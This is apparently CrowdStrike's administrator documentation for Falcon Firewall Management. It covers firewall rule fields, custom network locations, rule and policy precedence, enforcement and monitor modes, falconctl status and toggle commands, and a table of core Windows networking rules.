-IPv4: Protocol field

-IPv6: Next Header field

See the Internet Assigned Numbers Authority's (IANA) official list of protocols: iana.org

Note: IGMP, IP-in-IP, IPv6 Encapsulation, and GRE are not supported for Linux.

Local Address and Remote Address: Enter the local IP addresses and remote IP addresses the rule will match, if any. Related Firewall Events report the exact address involved in the connection that matches the rule. The Local Address and Remote Address fields support the same values.

Note: On Mac hosts, Outbound or Both rules applied to outbound traffic will not apply based on the local IP because mac OS hosts always report the local IP address as 0.0.0.0 or NULL.

Important: When IP address is selected for Address Type, every address defined in these fields must be either IPv4 OR IPv6, matching the protocol selected in Address Family for this rule.

IPv4: Define using one of these formats:
- A single IP address
- Commas and hyphens
  - Semicolons can be used to separate individual IP addresses and ranges (limited to 1,000 identified addresses)
- CIDR notation with a network prefix as a single integer from 1-32, inclusive
IPv6: Define a single IP address or use CIDR notation to define an address range. Single integers from 1-128, inclusive

Examples of acceptable address ranges:
- 192.168.0.0/8
- 10.0.2-4.30,220-224
- fe80::a8bb:ccff:fedd:eeff
- 1022::beef:168:aa30:a09/120,
- 5aef:2b::8/112
- ::1
Example of a range that would be rejected:
- 192.168.1-254.1-254

Local Port and Remote Port: Enter the local ports and remote ports the rule will match, if any. Format the Local Port and Remote Port fields using these supported parameters:

Single port value: Define with an integer from 1 to 65535.
Ranges of port numbers: Define using a hyphen. For example, 3000-4000.
Combinations of single values and ranges in a single rule: Define using an array. For example, 22, 80-88.

Action to Take: Select an option:

Allow: Defined network connections are permitted
Block: Defined network connections are denied

Direction: Select an option:

Inbound: Rule will apply to network traffic from the Remote Address/Port to the Local Address/Port.
Outbound: Rule will apply to network traffic from the Local Address/Port to the Remote Address/Port.
Inbound and outbound: Rule will apply to all network traffic between the Remote Address/Port and the Local Address/Port.

Network Locations: Specify the Windows network location profiles where this firewall rule should be applied:

Any
Domain
Private
Public
Custom network locations for Falcon Firewall Management rules

Note: Domain, private, and public locations are only available for Windows users.

Note: Network location is not supported for Linux.

Executable Filepath (optional):

Use this field to create a process-specific firewall rule. For example, this can be useful if you need to allow a program in a certain folder access to a port that is blocked to all other traffic by another firewall rule. When this field is blank the rule is applied for all processes. Your input must adhere to the following guidelines.

Note: Executable filepath is not supported for Linux.

Note: Multiple file paths within a single firewall rule are not supported. Create separate firewall rules for different file paths.

For static file paths:

It must include a drive letter such as C: or D:
One of the two special names:
- %SystemRoot% usually means C:\windows
- %SystemDrive% usually means C:
This field does not support ping.exe
The value can also be a fully specified UNC path for network locations, such as: \\server\share\file\to\path.exe

Note: If the sensor can’t resolve the drive letter entered in this field when the rule is enforced, it reports a FirewallRuleApplicationFailed event in Endpoint security > Firewall > Activity.

For dynamic file paths:

Include glob syntax to create a wildcard rule for a dynamic file path. For more info, see Glob Syntax.
Do not include a drive letter such as C:or D:

Type Address

Dynamic file path

Mac:

/Applications/ Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper

Windows:

**\Program Files\Microsoft Office\root\Office*\*.exe

Static file path

Mac:

/Applications/ Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/103.0.5060.53/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper

Windows:

C:\Program Files\Google\Chrome\Application\chrome.exe
%SystemRoot%\System32\cmd.exe

Note: Enclose individual bracket characters ( [ or ] ) in the input field inside of additional square brackets.

Test String (optional):

This case sensitive field appears when the system detects glob syntax in the Executable Filepath field. To confirm that the wildcard works as expected, enter sample URLs.

Service Name (optional): Enter a specific service name for the rule to match. This is converted to a Service SID, which Windows Filtering Platform can match. When this field is blank the rule is applied for all services.

Watch Mode: Select this option to see the events associated with this rule in Endpoint security > Firewall > Activity. You might want to use this setting for troubleshooting, testing a newly added firewall rule, or monitoring a critical firewall rule.

Note: Turn on watch mode to report events associated with the rule. When watch mode is enabled, one event per hour is viewable for the rule.

Configure firewall rules for domain controller

See Microsoft’s documentation for more information about defining rules for domain controllers.

Custom network locations for Falcon Firewall Management rules

Falcon Firewall Management enables you to configure custom network locations for firewall rules in the Falcon Console. This allows you to apply specific rule sets to each host based on their location. The sensor uses these network location definitions to automatically determine which location to activate and enforces the firewall rules associated with that location.

Windows Falcon Firewall Management also supports the following native network profiles:

Domain
Private
Public

Note: If there is no custom network location applied to a Windows host’s network interface, Falcon Firewall falls back to native profiles.

Note: Network locations are not supported for Linux.

You can set up custom network locations for each network interface on Windows hosts, which allow for multiple network locations to be active on a single computer. For example, you might apply more strict rules for traffic routing through Wi-Fi and more relaxed rules for traffic routing through the Ethernet adapter. This per network-interface application of custom network locations is similar to how domain, public and private profiles apply to Windows computers.

Note: For macOS, a single network location will apply across the entire computer, whereas Windows network locations will apply per host network interface

You can configure multiple criteria per network location and link them to Firewall rules. There are five passive criteria that can instantly detect changes to endpoint and/or network configuration.

Criteria
Connection type & SSID	Checks for wired or wireless connection and optionally determines if a wireless connection is encrypted and/or identified by a known SSID.
Gateway IP address	Checks the IP address of the host’s network gateway.
DHCP server address	Checks the IP address of the host’s DHCP server.
DNS server address	Checks the IP address of the host’s DNS servers.
Host IP address	Checks the IP address assigned to the host.

There are three active criteria available that cause the Falcon Sensor to probe your network for certain conditions. These probes are triggered whenever the Falcon Sensor detects changes in the network configuration or at regular polling intervals set by you. The polling interval you choose for each active criteria is applied across all network locations for that criteria. For example, all network locations in your CID that use a DNS resolution test will use the same polling interval.

Note: These criteria detect changes asynchronously, and there may be a noticeable delay in evaluating a new location.

Criteria

Ping test

Tests domain names or IP addresses for response to a ping request.

DNS resolution test

Tests whether the domain names can be resolved by the host. Optionally, you can provide the IP addresses you expect.

HTTPS certificate test

Tests whether the domain names can be reached using HTTPS. Optionally, specify a port using the standard notation as defined in RFC 2396, such as internal-service.company.com:8000. The server must be using a valid SSL certificate trusted on the host. Untrusted self-signed certificates are rejected.

The criteria for HTTPS certificates are supported on Windows 7, as well as Windows 10 v1703 (Redstone 2) and later.

We recommend you use the active criteria sparingly or consider lengthening the time between polling to prevent excessive system load. Also, keep in mind that Ping, DNS resolution, and HTTPS certificate tests are asynchronous and won’t detect changes instantly.

For example, you may want to create a network location to detect whether the host is on the company VPN to allow access to various resources on the company network. If you have a DNS server located at an IP address of 123.1.1.2 that is assigned to the host only when it is on the VPN, you can create a network location and add a criteria for that DNS server address. Then that network location becomes active when the host is on the VPN. Then you can add that network location to a Firewall rule that only activates when the VPN is connected. This approach provides instant detection of location changes and creates less load on your network.

Alternatively, if you have an internal domain that is only reachable through a VPN and has an HTTPS certificate signed by a trusted Certificate Authority (CA), such as intranet.company.local, you can create a network location using the HTTPS certificate criteria. That network location becomes active when intranet.company.local is reachable through the VPN and has an HTTPS certificate signed by a trusted CA. You can then add that network location to a Firewall rule that only activates when the VPN is connected and intranet.company.local is reachable with a valid SSL certificate. While this approach provides stronger security against potential spoofing, it creates more load on your network and may not apply instantly because it is asynchronous.

HTTPS certificate location configuration

When more than one network location is detected, the one with the highest precedence is activated. To reorder them, click Edit precedence then drag and drop them directly in the list.

Configure a custom rule

Follow these steps to configure a custom firewall rule for macOS.

In the console, go to Endpoint security > Firewall > Network locations.
Click Create network location.
Enter a location name and description.
Click Create location.
(Win and macOS only) In the network location builder, click to select the criteria to use.
- If you select Connection type & SSID, you can choose wireless or ethernet. When you select wireless, you’ll have the additional option of limiting the criteria to encrypted networks and/or SSIDs.
  
  Note: SSIDs are easily spoofed and are therefore a less secure option.
  
  Note: For endpoints running Windows 11 version 24H2 build 26100 and later, location services must be enabled for all services on the endpoint to use the Connection Type & SSID criteria due to a Microsoft bug. For more info, see our knowledge article, Windows 11 version 24H2 build 26100 impacts Falcon Firewall custom network locations. For US-GOV-1 and US-GOV-2 customers, see Windows 11 version 24H2 build 26100 impacts Falcon Firewall custom network locations.
  
  Note: For endpoints running macOS Sonoma 14 and later, if the Connection Type & SSID criteria is added to a Firewall policy, the endpoint will receive an OS prompt asking the user to grant Falcon access to location permissions. For more info, see our knowledge article Tech Alert | Falcon Firewall SSID network location criteria cannot be resolved on macOS 14. For US-GOV-1 and US-GOV-2 customers, see Tech Alert | Falcon Firewall SSID network location criteria cannot be resolved on macOS 14.
- For Gateway IP address, DHCP server address or DNS server address, enter the network addresses (IPv4 or IPv6) to use. For Host IP address, network addresses can be IPv4, IPv6, or CIDR blocks.
- When you select the DNS resolution test, you’ll be prompted to enter a domain name and set the polling interval. Optionally, you can configure the IP addresses to expect.
  
  Note: If the resolved IP addresses do not match any of the expected IP addresses you provided, the criteria will fail even if the domain name can be resolved.
- For the HTTPS certificate test criteria, you’ll be prompted to enter a domain name and set the polling interval. You can also set a TCP port, such as company.com:8000.
- To configure the Ping test criteria, enter the domain names or IP addresses to target with an ICMP request and set the polling interval.
  
  Note: This criteria uses ICMP protocol.
After you’ve configured your network locations, click Save.
To enable this location, select Enable location from the Action dropdown menu.

Your custom locations are available in the Create a rule group modal.

To duplicate or delete a custom network location, go to Endpoint security > Firewall > Network locations. Then click to open the location and select Duplicate location or Delete location from the Action dropdown menu.

Add a custom network location to a rule

Once created, you can add the custom network location to new and existing rule groups. You can add multiple locations to a single firewall rule. Go to the Endpoint security > Firewall > Rule groups page. Then follow the steps to create or edit a firewall rule. For more info, see Create a firewall rule or Edit a rule.

Note: Domain, private, and public network locations are only available for Windows users. macOS users will not see those locations in the drop-down list under Network Location. Network locations are not supported for Linux.

Unexpected behavior may occur if you activate a firewall policy enabled with network locations on a sensor that does not have this feature. We recommend configuring separate firewall policies, rule groups, and host groups for hosts that use firewall network locations.

Firewall Rule ID and versions

When new firewall rules are created, they are automatically assigned a unique Rule ID and Version. These attributes are both available on the Rules tab of the Rule group details and in the details of all firewall eventsshown in Endpoint security > Firewall > Activity.

A firewall rule’s Rule ID always stays the same. When rules are copied, the copies of the rules each get their own unique Rule ID.

A rule’s Version number changes each time it’s edited. This makes it possible to distinguish firewall events from different versions of the same rule. From the details panel of any firewall event, click the Rule Name or Rule Version to go to the parameters defined in the specific version of the rule that triggered the event.

Firewall rules precedence

Firewall rules are processed according to precedence (sequential order) within their rule groups, so it is important to consider this when configuring a group. For example, strict rules should have a higher precedence than generic rules. You can reorder rules on the Rules tab of a Rule group details page.

Go to Endpoint security > Firewall > Rule groups, click the edit icon for a rule group.
Click Edit precedence to activate the drag and drop arrow controls.
Drag and drop the arrows to change the precedence order of your rules.
Click Save.

Enable or disable firewall rule groups and rules

Like policies, rule groups and the rules within them must be enabled for them to take effect on hosts.

Enable or disable rule groups

Enable or disable a rule group from the rule group's details page.

Go to Endpoint security > Firewall > Rule groups.
Click the name of the rule group to view its details.
Click Enable/Disable to update the rule group status.

Enable or disable rules

Enable or disable an individual rule from the Rules tab of a rule group's details page.

Go to Endpoint security > Firewall > Rule groups and find the rule you want to enable or disable.
Click the open menu icon
Click Edit firewall rule.
In the dialog, click Enable/Disable to update the rule group status.

Delete firewall rule groups

Rule group

Delete a firewall rule group you no longer need.

Go to Endpoint security > Firewall > Rule groups.
Click the Mac, Windows, or Linux tab to find the rule group you want to delete.
Click the name of the rule group you want to delete.
Click Delete.

Delete firewall rules

Delete firewall rules you no longer need from the Rules tab of a rule group page.

Go to Endpoint security > Firewall > Rule groups.
Click the Mac, Windows, or Linux tab to find the rule group that includes the rule you want to delete.
Click the name of the rule group that includes the rule you want to delete.
On the Rules tab, click the open menu icon of the rule you want to delete.
Click Delete.

Troubleshoot rule enforcement for macOS endpoints

If, after you’ve completed configuration and testing, your firewall rules aren’t enforced as you expected, confirm the following Requirements and Configure firewall policy settings:

macOS version is Big Sur 11.4 or later
sensor version 6.33 or later is loaded and running
macOS sensor version 6.41 or later is loaded and running for wildcard support
Windows sensor version 6.42 or later is loaded and running for wildcard support
the sensor received an updated firewall policy or rule for macOS
Enforce policy is enabled at the policy level
Monitor mode is disabled

Note: There is a known Apple network extensions issue that can cause TCP SYN packets to not be blocked. If this is a concern for you, file a ticket with Apple and mention feedback ticket FB14771319 - "Kernel leaks TCP SYN packet (and IP address) when flow is denied by NEFilterDataProvider.

Audit changes to firewall rules and rule groups

CrowdStrike automatically audits all changes to firewall rules and rule groups. There are two types of audit logs available to view changes to your firewall rules:

Log contents	Where to access
Full revision history of every firewall rule and rule group	In the Firewall rule groups page, click See audit log
Revision history of firewall rules within a specific rule group	Go to the firewall rule group’s details page and click the Audit log tab

Filter columns to group your view of the log. Logged revisions are defined in the Action column as Created, Updated, or Deleted.

Click any revision to see its Details panel:

For updates to rule groups, the revision’s details include whether it was enabled or disabled.
When individual rules have been updated, see the detailed changes that were made.

Manage your firewall policies

Use firewall policies to apply the rules in your firewall rule groups to your hosts. You can have a total of 100 firewall policies, including the Default Policy.

About Falcon policies

A policy is a collection of settings. Falcon includes many types of policies for specific purposes: prevention policies, sensor update policies, and more. All policies work the same way:

Create the policy and configure its settings
Assign the policy to one or more host groups
Falcon applies the policy settings to each host based on its host group membership and policy precedence

If a host doesn't belong to any host groups assigned to a policy, it automatically uses the settings defined in the default policy.

View your firewall policies

Go to Endpoint security > Firewall > Policies to see your firewall policies. Click the name of the policy to view its details.

Click the name of a firewall policy to see details and edit an individual policy.

Policy details are configured and displayed on four tabs:

Settings: Where to define whether and how the policy is applied to assigned host groups.
Assigned Host Groups: Where to define which host groups will use the settings of the policy if it is enforced.
Assigned Rule Groups: Where to assign the firewall rule groups to the policy, and the order in which they are enforced.

Create a firewall policy

Create your organization’s firewall policies to enforce your firewall rules on host groups.

Go to Endpoint security > Firewall > Policies and click Create policy.
Enter a name, description and platform, and then click Create policy.
There are two options to start a new firewall policy. Start from scratch or duplicate an existing policy.
- Empty Policy makes a new policy that contains no rule groups.
- Duplicate an existing policy copies one of your firewall policies with all of its assigned rule groups (but not host groups). Select one of your policies and click Duplicate.
Your firewall policy is created

Assign firewall rule groups to a firewall policy

Add firewall rule groups to your organization’s firewall policies so you can enforce your firewall rules on host groups.

Go to Endpoint security > Firewall > Policies and click the name of the policy you want to assign rules groups to.
Go to the firewall policy’s Assigned rule groups tab, and click Assign rule group.
In the Assign firewall rule groups to policy dialog, select rule groups, and click Assign groups.
Your selections are added to the list of Assigned rule groups in the position of lowest precedence.

Note: Assigning a rule group to a policy does not change the rule group’s enabled or disabled status.

Edit firewall rule group precedence in a firewall policy

Firewall rule groups are processed according to precedence within the firewall policies they’re assigned to, so it’s important to consider this when configuring a policy. For example, rule groups with strict rules should have a higher precedence than more generic rule groups.

Reorder rule group precedence on a policy’s Assigned rule groups tab.

Go to Endpoint security > Firewall > Policies and then click the policy name to the view the policy details.
Click Edit precedence to activate the drag and drop arrows.
Drag and drop the arrows to change the precedence order of your rules.
Click Save.

Remove a firewall rule group from a firewall policy

You can remove firewall rule groups from firewall policies. This does not delete the firewall rule group or the rules with it.

Go to Endpoint security > Firewall > Policies and click the the name of the policy to view its details.
Go to the firewall policy’s Assigned rule groups tab.
Click Remove from policy.

Configure firewall policy settings

Use the Settings tab of an individual firewall policy to configure whether and how the policy is applied. Go to Endpoint security > Firewall > Policies and click the name of the policy to view its details.

Screenshot of firewall policy, settings tab

Firewall policy enforcement and monitoring

Enforce Policy: Turn on this setting to apply the policy’s rules on the hosts in the assigned host groups. This disables the hosts’ OS firewall rules and overrides the firewall settings.
- Windows
  
  This disables the Windows hosts’ OS firewall rules. Falcon’s firewall rules take full precedence over the individual hosts in the assigned host groups existing Windows firewall settings. Any Windows firewall settings, such as those created using Windows group policies, remain on the system but do not function.
- macOS
  
  When the CrowdStrike Firewall is enforced on macOS hosts, it doesn’t override the OS firewall but works alongside it. As a result both firewalls can be active simultaneously. Both firewalls must be configured to allow for given traffic in order for it to flow. The OS firewall takes action first, so if the OS firewall blocks a piece of network traffic first, the Falcon Firewall won’t have visibility.
  
  For example, if the macOS firewall is configured to allow, and the CrowdStrike Firewall is configured to block, the block occurs. If the macOS firewall is configured to block, and the CrowdStrike Firewall is configured to allow, the connection is blocked.
- Linux
  
  When the CrowdStrike Firewall is enforced on Linux hosts, it does not change the configuration of any Linux firewalls and is compatible with them. As a result, CrowdStrike firewall works with existing firewall solutions on the host simultaneously. Similar to macOS, the ordering of different firewalls is not guaranteed.
Monitor Mode: Temporarily turn on this setting to allow traffic that would normally be blocked by the policy and report all associated events in Endpoint security > Firewall > Activity , where the Action taken for these events is labeled Would be blocked.

Note: During testing, if the noise is too high, or you need to determine whether the firewall events you’re seeing are from a firewall rule or default traffic rule: temporarily set the default traffic rules to Allow All. Remember to switch them back to the desired setting when you finish testing and disable Monitor Mode.
Local Logging (Windows, macOS, and Linux): Turn on this setting to record all traffic that matches rules assigned to this policy. When enabled, it creates a CSV formatted log file with the base name hbfw.log on the host at %SystemRoot%\System32\Drivers\CrowdStrike\ for Windows, /Library/Application Support/CrowdStrike/Falcon/ for macOS, and the base name falcon-hbfw.log on the host /var/log for Linux. Each log file is limited to 5 MB. Up to the 5 most recent log files are stored on the host.
- The log file contains the following information for each record:
  - Time stamp (UTC)
  - Rule Version
  - Action
  - Direction
  - Local Address
  - Local Port
  - Remote Address
  - Remote Port
  - Profile (unknown for macOS and Linux)
  - Image File Name
  - UPID
  - PID
  - User Name (unknown for macOS)
  - FDQN
  Note: Image File Name, UPID, PID, User Name, and FQDN are not supported for Linux.
- For macOS, when a network location change is detected, a new row will be added to the local log to indicate the change with the following information:
  - Time stamp (UTC)
  - Location
  - Interface
  - Network Location ID

Confirm an updated firewall policy or rule for macOS

To confirm a macOS endpoint received an updated firewall policy or rule, run one of the following commands in the terminal:

sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw
- Check the rule_count value. By default, this value is greater than 0 which includes 25 core rules and the default traffic rules at the policy level (inbound and outbound). If the value displayed increases or decreases, it indicates that a rule was added/enabled or removed/disabled.
sudo /Applications/Falcon.app/Contents/Resources/falconctl stats dynamic_settings | grep hbfw
- This value is the current firewall channel file version for the sensor. When this value changes, this indicates that the latest policy and rule settings are present on the endpoint.

Default traffic rules

Configure default rules to Allow All or Block All inbound or outbound traffic that is not otherwise specified by the policy’s assigned firewall rules.

CrowdStrike recommends setting your default rule for inbound traffic to Block All.

Firewall Default Policy

Policy precedence allows you to configure your Firewall policies so that when a policy is disabled, host groups adopt the next highest ranking enabled policy they’re assigned to. The default policy is the last policy in the order of precedence. It’s applied to all hosts that aren’t assigned to another enabled policy. As an added safeguard, the Falcon Firewall Management's Default Policy is configured to be unenforceable, which means that no Falcon Firewall policy will be pushed down to hosts assigned to the Default Policy. This guarantees that any hosts that aren't assigned to one of your Firewall policies won't have any traffic unintentionally blocked.

You can also create your own conservative policy for your hosts that aren’t assigned to another enabled firewall policy. To have this firewall policy take effect on your unassigned hosts instead of the updated default, enable the policy, position it in the last place of policy precedence before the Default Policy, and assign all of your host groups to it.

Editing firewall policy precedence

Like other falcon policies, firewall policies are processed according to precedence on the hosts they’re assigned to, so it’s important to consider this when configuring your organization’s firewall policies.

Policy precedence lets you configure your Firewall policies so that when a policy is disabled, host groups adopt the next highest ranking enabled policy they’re assigned to.

Reorder policy precedence on the Firewall Policies page.

Go to Endpoint security > Firewall > Policies.
Click Edit precedence to activate the arrows.
Drag and drop the arrows to change the precedence order of your rules.
Click Save to keep your changes.

Policy precedence determines which policy's settings are applied to a host when the host is a member of more than one policy. Define policies with different precedences to resolve conflicts. Then, when faced with a conflict, the cloud automatically applies the policy with the higher precedence (1 being higher than 2, which is higher than 3, and so on).

If a host is not a part of any groups, or the groups it belongs to have no policies assigned, it is automatically assigned to the default policy.

Assign firewall policies

Assign host groups to a host group. The hosts assigned to a firewall policy are shown on the policy’s Assigned host groups tab and in its expanded row view on the main firewall policies page.

To assign a host group within Firewall Policies:

Go to Endpoint security > Firewall > Policies and click the name of a policy to view its details.
Go to the Assigned host groups tab.
Click Assign groups to policy.
In the Assign groups to policy dialog, select one or more host groups.
Click Assign groups.

Note: Your host group selections are assigned to the policy.

Enable or disable a firewall policy

A firewall policy must be enabled through the policy’s details page, and enforced for the Falcon firewall rules to take effect on hosts. When an enforced firewall policy is enabled from Falcon console, Falcon’s firewall rules take precedence over the existing Windows firewall settings for individual host’s in the assigned host group. MacOS and Falcon firewall settings are enforced concurrently. Similarly, Linux and Falcon firewall settings are enforced concurrently.

When a firewall policy is disabled, hosts adopt the settings and rules from the next firewall policy they are assigned to according to precedence. If a host doesn't belong to any host groups assigned to a firewall policy, it automatically uses the settings defined in the default firewall policy. For more info, see Firewall Default Policy.

When a host group is no longer assigned to any firewall policies that are both enforced and enabled, the Falcon Firewall is removed from its hosts. When a Windows host stops receiving firewall policy from Falcon, it reverts back to its Windows firewall settings. Since macOS firewall settings are enforced concurrently with the Falcon firewall, when you remove the Falcon firewall, the macOS and Linux firewall settings remain active.

Note: Admins can modify the Windows firewall on hosts while Falcon is managing the firewall, but the changes don’t take effect unless the host stops receiving firewall policy from Falcon.

To enable or disable a policy:

Go to Endpoint security > Firewall > Policies and click the name of the policy you want to view.
Click the Mac, Windows, or Linux tab to find the policy you want to enable/disable.
Click the name of the policy you want to enable/disable.
Click Enable policy/Disable policy.

CrowdStrike recommends following the same steps given above to manage macOS firewall settings from the Falcon console. However, in the event of an emergency or for troubleshooting you can disable and enable the firewall and event monitoring by running these commands in the terminal:

To disable: sudo /Applications/Falcon.app/Contents/Resources/falconctl disable-filter
To enable: sudo /Applications/Falcon.app/Contents/Resources/falconctl enable-filter

Delete a firewall policy

Permanently remove a firewall policy by deleting it. You must disable the before you can delete it. For more info, see Enable or disable a firewall policy.

Go to Endpoint security > Firewall > Policies and click the name of the policy you want to view.
Click Delete policy.

Note: The Windows, macOS, or Linux firewall settings show the settings that the host would revert to if Falcon firewall policy was removed. Admins can modify the Windows, macOS, or Linux firewall on hosts while Falcon is managing the firewall, but the changes don’t take effect unless the host stops receiving firewall policy from Falcon.

screenshot of Windows Defender Firewall showing the CrowdStrike message that says These settings are being managed by vendor application CrowdStrike Falcon Sensor

View Firewall Events

Go to Endpoint security > Firewall > Activity to see events associated with firewall rule and policy matches. Click any firewall event’s row to expand its details.

When a policy is in Monitor mode, Falcon records events associated with traffic that matches your firewall rules that have Watch mode enabled. It also records traffic that matches the policy’s Default traffic rules and the assigned firewall rules that would be blocked if Monitor mode was turned off. The Action taken for these events is labeled Would be blocked.

Click any firewall event’s row to expand its details.

Check compliance

Windows

If your organization requires a compliance check performed by applications like VPN software, we provide a registry key called EnforcementLevel located under HKLM\Software\CrowdStrike\FWPolicy. A value of 1 indicates that the firewall is enabled and enforced.

macOS

If your organization requires a compliance check performed by applications like VPN software run sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw. If the values for data, packet, and rule_count are more than 0 (zero), this confirms that the firewall is enabled and enforced.

Linux

If your organization requires a compliance check performed by applications like VPN software, run sudo/opt/CrowdStrike/falconctl -g --hbfw-state. If the output is hbfw-state=enabled, this confirms that the firewall is enabled and enforced.

Note: If the firewall is disabled on the host using the command sudo /Applications/Falcon.app/Contents/Resources/falconctl disable-filter, the falconctl stats command will show the same values for the fields data, packet, and rule_count that it shows if the disable-filter command is not run. Before checking compliance on a host, run the enable-filter command to confirm the firewall is not disabled.

Network Auditing in Windows

While using Falcon Firewall Management, you can enable Windows Filtering Platform’s auditing of firewall-related events on a host to view them in the Windows Security Log for that host.

To enable this reporting, run:

auditpol /set /subcategory:"{0CCE9226-69AE-11D9-BED3-505054503030}" /success:enable /failure:enable

See Windows documentation for more information.

Confirm firewall policies on a macOS endpoint

To confirm that CrowdStrike’s macOS firewall policies are enforced on an endpoint, run the following command in the terminal:

sudo /Applications/Falcon.app/Contents/Resources/falconctl stats hbfw

In the output, locate ===hbfw=== and look for these three values:

data
packet
rule_count

If these values are all 0 (zero), then this means that the firewall is not enabled and not enforced.

Example: Results for a disabled firewall

=== hbfw ===

data: 0

log: 0

packet: 0

rule_count: 0

Example: Results for an enabled firewall

=== hbfw ===

data: 27

log: 0

packet: 2

rule_count: 27

You can also use these value outputs to check for compliance.

Confirm firewall policies on a Linux endpoint

To confirm that CrowdStrike’s Linux firewall policies are enforced on an endpoint, run the following command in the terminal:

sudo /opt/CrowdStrike/falconctl -g –hbfw-state

The output of this command shows the status of the firewall:

hbfw-state=enabled: Firewall is enabled and running
hbfw-state=disabled: Firewall is disabled
hbfw-state=unavailable: Firewall is not supported on the host
hbfw-state is not set: On a Kernel Mode Linux sensor, the firewall status is not set

Support for advanced protocols on macOS hosts

The API on macOS (packet provider) that supports firewall functionality for advanced protocols is disabled by default because, in a small number of instances, it might cause a macOS host to disconnect from the network when combined with VPN and external network interfaces active on that host.

This issue won’t affect most, if any, of your hosts. When advanced protocols are used, CrowdStrike recommends you enable and test the packet provider before deploying. After the packet provider is enabled, the sensor doesn’t need to be reloaded and a new firewall policy isn’t required. Rules in the deployed policy with an advanced protocol are immediately enforced.

To enable the Falcon packet provider, run sudo /Applications/Falcon.app/Contents/Resources/falconctl enable-packet-provider

CrowdStrike Core Windows Networking Firewall Rules

These rules are automatically enabled on every firewall policy, and are processed before all other rules. There is also an option available to copy these rules when starting a new rule group. These core rules are periodically edited and new ones are periodically added. See the most up-to-date list by clicking the Templates tab on Endpoint Security > Firewall > Rule groups. For more info, see Create a firewall rule group.

Status	Rule name	Description	Traffic direction	Action to take	Event frequency	Protocol	Local IP	Local port	Remote address	Remote port	Executable filepath	Location
Enabled	ICMPv6 Neighbor Solicitation	Allow ICMPv6 type 135 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	Receive ICMP ping reply	Allow ICMPv6 echo reply Inbound to the System process	In	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	ICMPv6 Multicast Listener Query	Allow ICMPv6 type 130 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	Internet Group Management (IGMP)	Allow IGMP (Internet Group Management) In and Out to and from the Systemprocess	Both	Allowed	0 / 0ms	2	*		*		System	Any
Enabled	ICMPv6 Multicast Listener Report	Allow ICMPv6 type 131 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	DHCP on IPv4 Service name: Dhcp	Allow DHCP In and Out to and from the Dhcp service	Both	Allowed	0 / 0ms	UDP	*	68	*	67	%SystemRoot%\System32\svchost.exe	Any
Enabled	Microsoft DS Group Policy Service name: Gpsvc	Allow TCP Out from the Group Policy service when on the Domain	Out	Allowed	0 / 0ms	TCP	*		*		%SystemRoot%\System32\svchost.exe	Domain
Enabled	DNS request Service name: Dnscache	Allow DNS Out from the Dnscache service	Out	Allowed	0 / 0ms	UDP	*		*	53	%SystemRoot%\System32\svchost.exe	Any
Enabled	Network Time Protocol Service name: W32Time	Allow UDP Out from the W32Time service to NTP port	Out	Allowed	0 / 0ms	UDP	*		*	123	%SystemRoot%\System32\svchost.exe	Any
Enabled	Microsoft DS Network Sharing	Allow TCP from the System process to DS network share port when on theDomain	Out	Allowed	0 / 0ms	TCP	*		*	445	System	Domain
Enabled	ICMPv6 Multicast Listener Report version 2	Allow ICMPv6 type 143 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	DHCP on IPv6 Service name: Dhcp	Allow DHCPv6 In and Out to and from the Dhcp service	Both	Allowed	0 / 0ms	UDP	*	546	*	547	%SystemRoot%\System32\svchost.exe	Any
Enabled	ICMPv6 Parameter Problem	Allow ICMPv6 type 4 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	ICMPv6 Neighbor Advertisement	Allow ICMPv6 type 136 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	ICMPv6 Packet Too Big	Allow ICMPv6 type 2 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	ICMPv6 Multicast Listener Done	Allow ICMPv6 type 132 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	Lsass	Allow TCP Out from the lsass process when on the Domain	Out	Allowed	0 / 0ms	TCP	*		*		%SystemRoot%\system32\lsass.exe	Domain
Enabled	ICMPv6 Router Solicitation	Allow ICMPv6 type 133 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	ICMPv6 Router Advertisement out	Allow ICMPv6 type 134 Out from the System process	Out	Allowed	0 / 0ms	ICMPv6	fe80::		*		System	Any
Enabled	ICMPv6 Router Advertisement in	Allow ICMPv6 type 134 Into the System process	In	Allowed	0 / 0ms	ICMPv6	*		fe80::		System	Any
Enabled	ICMPv6 Time Exceeded	Allow ICMPv6 type 3 In and Out to and from the System process	Both	Allowed	0 / 0ms	ICMPv6	*		*		System	Any
Enabled	Receive ICMP destination unreachable - fragmentation needed reply	Allow ICMPv4 type 3 code 4 Inbound to the System process	In	Allowed	0 / 0ms	ICMPv4	*		*		System	Any

Zero Trust Assessment

Better understand the security posture of your organizations hosts through a granular assessment of their OS and sensor settings.

Overview

Zero Trust Assessment (ZTA) monitors OS settings and sensor settings of hosts within your organization. This granular assessment of eligible hosts is used to produce a score that uniquely represents the security posture of each host.

Use the Zero Trust Assessment dashboard to view a holistic overview as well as a detailed assessment of monitored hosts, to surface and remediate mismanaged settings, and to increase the security posture of hosts.

Requirements

Subscription: Falcon Insight XDR
Host System Requirements: The ZTA dashboard monitors and displays information only for hosts on these operating systems:
- macOS
- Windows 10 and later
- Windows Server 2016 and later
- Windows Server 2019
- Windows Server 2022
- Linux
- Android
- iOS
Roles: All roles that have access to Investigate can access the ZTA dashboard.
The following permissions are required to access the ZTA dashboard:
- Host Management: Read device details
- LogScaleViews: Read Logscale data
- LogScale Views: View investigate data in LogScale
- XDR: General LogScale Read Access
- Investigate Views: Read Investigate
- Investigate Views: Read Investigate Data
